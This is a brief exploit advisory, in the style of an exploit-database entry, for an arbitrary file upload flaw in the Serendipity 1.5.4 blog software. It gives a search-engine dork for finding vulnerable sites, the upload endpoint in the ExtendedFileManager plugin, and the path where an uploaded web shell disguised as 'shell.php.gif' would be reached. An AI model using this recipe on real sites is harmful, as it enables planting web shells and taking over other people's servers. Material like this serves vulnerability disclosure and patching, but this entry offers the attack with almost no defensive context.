Serendipity 1.5.4 0day Arbitrary File Upload Vulnerability

2010-12-21
ID: 15200
CVE: None
Download vulnerable application: None
In The Name Of GOD
[+] Exploit Title:remote 0day file upload
[+] Date: 2010
[+] script:Serendipity 1.5.4
[+] Software Link: http://www.s9y.org/12.html
[+] Author  : pentesters.ir
[+]discovered by:ahmadbady
[+] Contact : [email protected]
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, navid, ...
[+]dork:"Powered by s9y"  and  "Powered by serendipity"
----------------------------------------------------------------------------
up:
/path/htmlarea/plugins/ExtendedFileManager/manager.php
  shell:
/htmlarea/plugins/ExtendedFileManager/demo_images/shell.php.gif
------------------------------------------------------------------------------
1-4-2 (www01)